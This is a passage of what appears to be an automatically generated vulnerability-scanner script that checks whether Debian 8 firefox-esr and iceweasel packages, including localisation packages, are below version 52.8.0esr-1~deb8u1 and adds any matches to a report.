res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += 